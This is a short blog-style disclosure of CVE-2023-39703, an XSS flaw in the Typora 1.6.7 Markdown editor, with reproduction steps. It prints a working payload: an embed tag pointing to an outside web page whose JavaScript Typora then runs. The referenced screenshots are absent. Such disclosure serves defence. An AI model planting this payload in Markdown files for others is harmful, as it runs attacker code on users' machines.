Headline
CVE-2023-39703: Typora XSS Vulnerability
A cross site scripting (XSS) vulnerability in the Markdown Editor component of Typora v1.6.7 allows attackers to execute arbitrary code via uploading a crafted Markdown file.
Vulnerability Overview
There is an XSS vulnerability because the editor mishandled when parsing the embed tag in html. The html tag is <embed src="https://c0olw.github.io/pic/1.html">
Vulnerability Reproduction
Download the lastest version of Typora from https://typora.io/.
The version when I downloaded was 1.6.7.
Use Typora to open or edit a markdown file.
For example, I created a file called “xss test.md” with typora.
Enter <embed src="https://c0olw.github.io/pic/1.html"> to let Typora parse the html tags, resulting in the execution of malicious Javascript.
When just entering the embed tag:
After Typora parses the embed tag:
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 凉风’s Blog!